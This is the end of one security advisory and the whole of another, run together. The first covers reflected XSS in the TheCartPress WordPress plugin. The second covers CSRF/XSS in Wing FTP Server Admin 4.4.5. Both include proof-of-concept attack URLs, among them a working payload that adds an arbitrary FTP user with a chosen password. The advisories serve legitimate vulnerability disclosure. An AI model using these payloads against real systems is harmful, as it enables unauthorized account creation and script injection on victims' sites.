script code in browser in context of the vulnerable website. http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E 4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E ----------------------------------------------------------------------------------------------- Solution: 2015-04-08 Vendor Alerted via emails. 2015-04-17 Vendor Alerted via contact form and emails. 2015-04-17 Vendor Alerted via WordPress Support Forums. 2015-04-27 Fix Requested via emails. 2015-04-29 Public disclosure. Currently we are not aware of any official solution for this vulnerability. According to the vendor the plugin will not be supported anymore since 1st of June 2015: http://thecartpress.com/extend/important-note-nota-importante/ We recommend disabling or removing the vulnerable plugin as a workaround. ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23254 - https://www.htbridge.com/advisory/HTB23254 - Multiple vulnerabilities in TheCartPress Wordpress plugin. [2] TheCartPress Wordpress plugin- http://thecartpress.com/ - Professional WordPress eCommerce Plugin. Use it as Shopping Cart, Catalog or Framework. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Document Title: =============== Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities Release Date: ============= 2015-04-28 apparitionsec ID (AS-ID): ==================================== AS-WFTP0328 Common Vulnerability Scoring System: ==================================== Overall CVSS Score 8.9 Product: =============================== Wing FTP Server is a Web based administration FTP client that supports following protocols FTP, FTPS, HTTPS, SSH Advisory Information: ============================== Security researcher John Page discovered a CSRF & client-side cross site scripting web vulnerability within Wing FTP Server Admin that allows adding arbitrary users to the system. Vulnerability Disclosure Timeline: ================================== March 28, 2015: Vendor Notification March 28, 2015: Vendor Response/Feedback April 19, 2015: Vendor Notification April 28, 2015: Vendor released new patched version 4.4.6 April 28, 2015: Public Disclosure - John Page Affected Product(s): ==================== Wing FTP Server Admin 4.4.5 Product: Wing FTP Server - Admin Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Request Method(s): [+] POST & GET Vulnerable Product: [+] Wing FTP Server Admin 4.4.5 Vulnerable Parameter(s): [+] domain & type Affected Area(s): [+] Server Admin Proof of Concept (POC): ======================= The CSRF and client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction (click). Payload will add arbitrary users to the system. POC: Example http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES] POC: Payload(s) Add arbitrary user to the system: http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E POC XSS: http://localhost:5466/admin_viewstatus.html?domain= POC XSS: http://localhost:5466/admin_event_list.html?type= Solution - Fix & Patch: ======================= Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server) Security Risk: ============== The security risk of the CSRF client-side cross site scripting web vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9 Credits & Authors: ================== John Page ( hyp3rlinx ) - ISR godz @apparitionsec Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. the security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domains: hyp3rlinx.altervista.org